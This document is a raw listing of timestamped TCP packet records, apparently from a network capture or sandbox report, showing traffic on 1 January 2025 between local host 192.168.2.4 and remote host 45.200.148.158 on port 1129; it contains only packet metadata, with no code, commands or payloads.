Jan 1, 2025 18:10:00.931226969 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.931227922 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.931248903 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.931257963 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.931257963 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.931276083 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.931292057 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.931335926 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.932075024 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.932087898 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.932106018 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.932118893 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.932135105 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.932136059 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.932151079 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.932159901 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.932161093 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.932185888 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.932190895 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.932199001 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.932214975 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.932229042 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.932229996 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.932245970 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.932272911 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.932291985 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.933002949 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.933015108 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.933037996 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.933051109 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.933063030 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.933064938 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.933080912 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.933087111 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.933090925 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.933113098 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.933123112 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.933126926 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.933144093 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.933155060 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.933157921 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.933173895 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.933185101 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.933212996 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.933876038 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.933887959 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.933903933 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.933918953 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.933931112 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.933933020 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.933949947 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.933968067 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.933969021 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.933988094 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.933988094 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.934000969 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.934017897 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.934027910 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.934031010 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.934048891 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.934057951 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.934061050 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.934078932 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.934082031 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.934122086 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.934874058 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.934890985 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.934904099 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.934920073 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.934931993 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.934945107 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.934947968 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.934976101 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.934979916 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.934995890 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.935009003 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.935019970 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.935025930 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.935039043 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.935041904 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.935056925 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.935072899 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.935080051 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.935111046 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.935877085 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.935893059 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.935909033 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.935924053 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.935928106 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.935933113 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.935947895 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.935950994 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.935967922 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.935986042 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.935997009 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.935997009 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.936013937 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.936016083 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.936032057 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.936045885 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.936048031 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.936062098 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.936073065 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.936110973 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.936712980 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.936728954 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.936738968 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.936757088 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.936767101 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.936788082 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.936790943 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.936790943 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.936801910 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.936817884 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.936831951 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.936844110 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.936849117 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.936860085 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.936872005 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.936877966 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.936888933 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.936888933 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.936908007 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.936935902 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.936959028 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.937623024 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.937634945 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.937652111 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.937663078 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.937675953 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.937680960 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.937696934 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.937697887 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.937711000 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.937731028 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.937733889 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.937741041 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.937761068 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.937783957 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.937804937 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.938369989 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.938383102 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.938405037 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.938417912 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.938431978 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.938433886 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.938448906 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.938456059 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.938460112 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.938481092 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.938491106 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.938491106 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.938510895 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.938520908 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.938524961 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.938545942 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.938556910 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.938556910 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.938585043 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.939274073 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.939285994 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.939310074 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.939330101 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.939340115 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.939357996 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.939367056 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.939367056 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.939367056 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.939369917 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.939389944 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.939404964 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.939414024 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.939415932 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.939433098 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.939448118 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.939444065 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.939460039 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.939472914 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.939480066 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.939488888 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.939496040 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.939506054 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.939517021 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.939557076 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.939579964 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.940068007 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.940083981 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.940097094 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.940128088 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.965003014 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.965013027 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.965030909 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.965081930 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.965095997 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.965104103 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.965118885 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.965158939 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.965198040 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.965209007 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.965228081 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.965262890 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.965440989 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.965459108 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.965496063 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.965496063 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.965507030 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.965527058 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.965532064 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.965538979 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.965583086 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.965714931 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.965725899 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.965770960 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.965811968 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.965862036 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.971288919 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.971358061 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.971376896 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.971411943 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.971421003 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.971460104 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.971494913 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.971506119 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.971544981 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.971625090 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.971636057 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.971652985 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.971676111 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.971759081 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.971784115 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.971796036 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.971805096 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.971834898 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.972009897 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.972029924 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.972043037 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.972064972 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.972080946 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.972084045 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.972098112 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.972105026 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.972114086 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.972170115 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.972425938 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.972471952 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.972496986 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.972507954 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.972558022 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.977324009 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.977390051 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.977400064 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.977441072 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.977530956 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.977543116 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.977586985 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.977622986 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.977636099 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.977652073 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.977663040 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.977691889 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.979290009 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.979351997 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.979366064 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.979394913 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.979475021 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.979490042 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.979532957 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.979605913 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.979617119 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.979648113 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.980021954 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.980045080 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.980070114 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.980142117 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.980153084 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.980192900 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.980258942 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.980269909 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.980333090 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.980370998 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.980380058 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.980415106 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.980484962 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.980501890 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.980509043 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.980514050 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.980531931 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.980547905 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.980575085 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.980798006 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.980808973 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.980844975 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.983413935 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.983437061 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.983449936 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.983483076 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.983552933 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.983565092 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.983583927 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.983603001 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.983634949 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.983700037 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.983711004 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.983732939 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.983752012 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.983831882 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.983843088 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.983859062 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.983874083 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.983901978 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.983971119 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.983987093 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.983999968 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.984029055 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.984071970 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.984112978 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.984169960 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.984180927 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.984200001 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.984213114 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.984220982 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.984260082 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.984288931 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.984364986 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.984384060 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.984397888 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.984414101 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.984431982 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.984464884 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.984597921 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.984611034 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.984638929 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.984746933 CET	1129	49730	45.200.148.158	192.168.2.4
